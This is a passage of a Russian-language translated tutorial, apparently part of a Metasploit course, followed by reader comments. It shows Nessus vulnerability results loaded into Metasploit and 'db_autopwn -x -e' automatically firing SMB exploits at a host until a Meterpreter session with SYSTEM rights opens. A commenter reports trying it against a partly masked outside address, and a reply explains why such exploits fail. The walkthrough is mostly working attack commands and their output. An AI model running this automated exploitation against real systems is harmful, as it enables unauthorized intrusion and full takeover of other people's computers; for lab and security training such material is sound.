[*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=123 proto=udp state=up name=ntp
И наконец, самое главное, команда "db_vulns" выведет список всех уязвимостей, которые были найдены Nessus и записанные в файле результатов.
msf > db_vulns [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=22 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.50282 refs=NSS-1.3.6.1.4.1.25623.1.0.50282 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=139 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=137 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10150 refs=NSS-1.3.6.1.4.1.25623.1.0.10150,CVE-1999-0621 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.10394 refs=NSS-1.3.6.1.4.1.25623.1.0.10394 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=123 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10884 refs=NSS-1.3.6.1.4.1.25623.1.0.10884
Все вышеперечисленные действия вывели нас к команде «db_autopwn». «db_autopwn» считает из файла результатов «nbe» все порты, сервисы и сведения об уязвимостях и автоматически попытается подобрать эксплоиты под них. Запустим "db_autopwn -h", чтобы посмотреть все доступные опции.
msf > db_autopwn -h [*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references -p Select modules based on open ports -e Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port -q Disable exploit module output -I [range] Only exploit hosts inside this range -X [range] Always exclude hosts inside this range -PI [range] Only exploit hosts with these ports open -PX [range] Always exclude hosts with these ports open -m [regex] Only run modules whose name matches the regex
Мы запустим «db_autopwn -x -e» для выбора модуля эксплоита на основе уязвимости( а не только порта, как с «nmap» результатами) и проэксплуатируем уязвимости.
msf > db_autopwn -x -e [*] (8/38): Launching exploit/multi/samba/nttrans against 192.168.1.115:139... [*] (9/38): Launching exploit/windows/smb/psexec against 192.168.1.115:445... [*] (10/38): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.115:445... [-] Exploit failed: The connection was refused by the remote host (192.168.1.115:22). [*] (35/38): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.115:445... [*] Started bind handler [-] Exploit failed: No encoders encoded the buffer successfully. msf > [*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:1.0@ncacn_np:192.168.1.115[alert] ... [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.115[lsarpc]... [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (192.168.1.101:40814 -> 192.168.1.115:14198)
Отлично! «db_autopwn» успешно проэксплуатировал хост и оболочка Meterpreter ждет нас. Команда «sessions -l» выведет список открытых для подключения сессий, а команда «sessions -i» позволит подключиться к указанной сессии.
msf > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.101:40814 -> 192.168.1.115:14198 msf > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: DOOKIE-FA154354 OS : Windows XP (Build 2600, Service Pack 2). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Как можно видеть, это очень мощное средство. Хотя и достаточно «шумное».
На этом чертвертую часть курса можно считать завершенной, до встречи в следующих частях.
Источник:
Перевод: Э_L_A_Y
Э_L_A_Y
Большое спасибо,
за качество и доступность статей,
просто не совсем о простых вещах.
Побольше бы таких и про другие проги…11!!!!!
Супер вещчь, вот тока с русскими логинами/паролями не могу научить работать. Может получилось у кого?
а если получаю такой результат:
[*] (1/15 [0 sessions]): Launching exploit/solaris/sunrpc/ypupdated_exec against xx.xx.xx.93:111…
[*] (2/15 [0 sessions]): Launching exploit/solaris/sunrpc/sadmind_adm_build_path against xx.xx.xx.93:111…
в последствии ни одной запущенной сессии…
это говорит о том, что защиту пробить не удалось, или же у меня неправильные настройки????
Вообще если вы применяете «заряженный» сплоит к сервису под который он «заточен», не забыв при этом выставить все необходимые параметры, которые необходимы для удачной «отработки» и получаете нулевой результат, значит либо сервис пропатчен, либо проверяйте действительно ли вы выбрали тот сплоит или как вариант соединение «режет» брандмауэр. Я так думаю :)